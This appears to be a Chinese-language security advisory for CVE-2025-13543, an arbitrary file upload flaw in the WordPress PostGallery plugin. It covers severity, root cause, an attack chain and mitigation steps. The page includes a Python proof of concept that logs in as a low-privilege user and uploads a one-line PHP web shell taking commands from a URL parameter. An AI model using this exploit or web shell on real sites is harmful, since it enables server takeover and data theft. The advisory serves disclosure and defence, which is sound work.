CVE-2025-13543 WordPress PostGallery插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-13543

漏洞类型

任意文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress PostGallery插件

漏洞概述

CVE-2025-13543是WordPress PostGallery插件中的一个高危安全漏洞，CVSS评分高达8.8。该漏洞存在于PostGalleryUploader类中，由于文件类型验证不正确，认证攻击者（拥有订阅者级别及以上权限）可以上传任意文件到服务器。成功利用此漏洞可能导致远程代码执行，使攻击者完全控制受影响的WordPress网站。漏洞影响所有1.12.5及以下版本。鉴于其低攻击复杂度和无需用户交互的特性，该漏洞极易被利用，对WordPress网站安全构成严重威胁。建议管理员立即升级到最新版本或采取临时缓解措施。

技术细节

漏洞根源在于PostGallery插件的PostGalleryUploader类中的文件上传功能存在不正确的文件类型验证。具体问题包括：1) 客户端验证可被绕过，攻击者可以修改请求中的文件类型参数；2) 服务端验证不足，未正确检查文件MIME类型和文件扩展名；3) 上传目录可执行，攻击者可以直接访问上传的文件并执行恶意代码。攻击者利用此漏洞可以上传包含恶意PHP代码的文件（如webshell），然后通过访问上传的文件路径在服务器上执行任意命令。由于WordPress的权限机制，订阅者级别用户即可利用此漏洞，大大降低了攻击门槛。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站订阅者级别账户或通过其他方式获取低权限凭据

STEP 2

步骤2

攻击者构造恶意文件上传请求，绕过插件的文件类型验证机制

STEP 3

步骤3

通过PostGalleryUploader类的漏洞点上传包含恶意代码的PHP文件（如webshell）

STEP 4

步骤4

攻击者访问上传的文件路径，在服务器上执行任意命令，实现远程代码执行

STEP 5

步骤5

攻击者进一步渗透，获取数据库凭据、植入后门或完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13543 PoC - PostGallery Arbitrary File Upload
# Target: WordPress site with PostGallery plugin <= 1.12.5

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'
username = sys.argv[2] if len(sys.argv) > 2 else 'subscriber'
password = sys.argv[3] if len(sys.argv) > 3 else 'password'

# Login to WordPress
session = requests.Session()
login_url = f'{target}/wp-login.php'
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': f'{target}/wp-admin/',
    'testcookie': '1'
}

session.post(login_url, data=login_data)

# Upload malicious PHP file via PostGallery uploader
upload_url = f'{target}/wp-admin/admin-ajax.php'
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/php')
}
data = {
    'action': 'post_gallery_upload',
    'post_id': '1'
}

try:
    response = session.post(upload_url, files=files, data=data)
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text}')
    
    # If upload successful, try to access the shell
    if response.status_code == 200 and 'upload' in response.text.lower():
        print('[+] File uploaded successfully!')
        print('[+] Access shell at: ' + target + '/wp-content/uploads/post-gallery/shell.php?cmd=whoami')
except Exception as e:
    print(f'[-] Error: {e}')

print('\n[!] Note: This PoC is for educational and authorized testing purposes only.')

影响范围

PostGallery插件所有 <= 1.12.5 版本

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用PostGallery插件；2) 通过.htaccess或nginx配置禁止上传目录执行PHP文件（将上传目录设置为只读且不可执行）；3) 限制文件上传功能的用户权限，仅允许管理员级别的账户访问；4) 部署Web应用防火墙规则监控和阻止异常的文件上传行为；5) 启用WordPress安全插件如Wordfence进行实时防护。